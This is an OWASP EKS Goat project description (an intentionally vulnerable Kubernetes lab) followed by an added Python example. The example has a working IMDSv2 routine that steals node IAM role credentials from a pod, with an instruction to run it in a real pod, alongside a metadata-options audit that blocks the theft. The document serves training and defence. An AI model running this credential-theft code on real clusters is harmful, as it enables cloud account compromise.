From https://github.com/OWASP/www-project-eks-goat
OWASP EKS Goat is an intentionally vulnerable Amazon EKS cluster built for hands-on security testing and learning in AWS cloud-native environments. It is an official OWASP project.
Key Features:
- Real-World Attack Scenarios: exploit vulnerable Jenkins apps running in EKS, compromise container images in ECR, steal node IAM role credentials from a pod through the EC2 Instance Metadata Service (IMDSv2), escalate privileges through misconfigured IAM roles, break out from a pod to the underlying EC2 node, and abuse Kubernetes RBAC for lateral movement
- Defense & Hardening: compliance assessment with Kubescape and kube-bench, runtime defense with Falco and Tetragon, and Amazon GuardDuty findings for EKS threats
- Hands-On Labs: a full walkthrough covering container and image security, AWS ECR exploitation, AWS EKS exploitation, scanning and auditing, and environment lifecycle management
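As an added example (not code from the EKS Goat project), the Python below walks through the node-credential theft step from the attack scenarios above and the instance-metadata check from the hardening side that blocks it. The IMDS endpoint, the role name `eks-goat-node-role` and every credential value are constructed stand-ins so the script runs offline; the `MetadataOptions` field names are the ones `aws ec2 describe-instances` returns.

```python
"""
Added example, not part of the EKS Goat project: the IMDSv2 exchange an
attacker runs from a compromised pod to obtain the node's IAM role
credentials, and the metadata-options audit that shows whether a node
still allows it. The fake IMDS endpoint, role name and credential values
below are constructed; nothing here is a real AWS secret.
"""
import json
import urllib.request
from urllib.error import HTTPError

TOKEN_TTL_HDR = "X-aws-ec2-metadata-token-ttl-seconds"
TOKEN_HDR = "X-aws-ec2-metadata-token"


def urllib_transport(base_url="http://169.254.169.254"):
    """Real transport for use inside a pod. Returns (status, body_text)."""
    def send(method, path, headers):
        req = urllib.request.Request(base_url + path, method=method, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=2) as resp:
                return resp.status, resp.read().decode()
        except HTTPError as e:
            return e.code, e.read().decode()
    return send


def fake_imds_transport(role="eks-goat-node-role", tokens=("fake-token-1",)):
    """Constructed stand-in for IMDSv2: a PUT issues a token, every GET needs one."""
    creds = {"Code": "Success", "Type": "AWS-HMAC",          # constructed values
             "AccessKeyId": "ASIAEXAMPLEEXAMPLE",
             "SecretAccessKey": "exampleSecret", "Token": "exampleSessionToken",
             "Expiration": "2030-01-01T00:00:00Z"}
    issued = set()
    pool = list(tokens)

    def send(method, path, headers):
        if method == "PUT" and path == "/latest/api/token":
            if TOKEN_TTL_HDR not in headers:
                return 400, ""
            tok = pool.pop(0) if pool else "fake-token-n"
            issued.add(tok)
            return 200, tok
        if headers.get(TOKEN_HDR) not in issued:
            return 401, ""                      # IMDSv1-style request refused
        if path == "/latest/meta-data/iam/security-credentials/":
            return 200, role
        if path == f"/latest/meta-data/iam/security-credentials/{role}":
            return 200, json.dumps(creds)
        return 404, ""
    return send


def steal_node_credentials(send):
    """Two-step IMDSv2 flow: obtain a session token, then read the node role's creds."""
    status, token = send("PUT", "/latest/api/token", {TOKEN_TTL_HDR: "21600"})
    if status != 200:
        raise RuntimeError(f"IMDS token request failed: {status}")
    status, role = send("GET", "/latest/meta-data/iam/security-credentials/",
                        {TOKEN_HDR: token})
    if status != 200:
        raise RuntimeError(f"listing roles failed: {status}")
    status, body = send("GET", f"/latest/meta-data/iam/security-credentials/{role}",
                        {TOKEN_HDR: token})
    if status != 200:
        raise RuntimeError(f"reading {role} failed: {status}")
    creds = json.loads(body)
    return {"role": role, "access_key_id": creds["AccessKeyId"],
            "secret_access_key": creds["SecretAccessKey"],
            "session_token": creds["Token"]}


def audit_metadata_options(instances):
    """Flag nodes whose MetadataOptions let a pod complete the flow above.

    `instances` mirrors the MetadataOptions part of `aws ec2 describe-instances`.
    With HttpPutResponseHopLimit=1 the PUT response carries IP TTL 1, so it is
    dropped when forwarded into a pod's network namespace (pods using hostNetwork
    are not protected by this). HttpTokens=optional still allows IMDSv1 GETs,
    which need no PUT at all, so the hop limit alone is not enough.
    """
    findings = []
    for inst in instances:
        opts = inst.get("MetadataOptions", {})
        if opts.get("HttpEndpoint", "enabled") == "disabled":
            continue
        reasons = []
        if opts.get("HttpTokens") != "required":
            reasons.append("IMDSv1 allowed (HttpTokens != required)")
        if opts.get("HttpPutResponseHopLimit", 1) > 1:
            reasons.append("hop limit > 1 lets pods reach IMDS")
        if reasons:
            findings.append((inst["InstanceId"], reasons))
    return findings
```

Inside a real pod you would call `steal_node_credentials(urllib_transport())`; the returned keys map directly onto `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` and `AWS_SESSION_TOKEN`, which is exactly the pivot GuardDuty's EKS findings and a hop limit of 1 with `HttpTokens=required` are meant to stop.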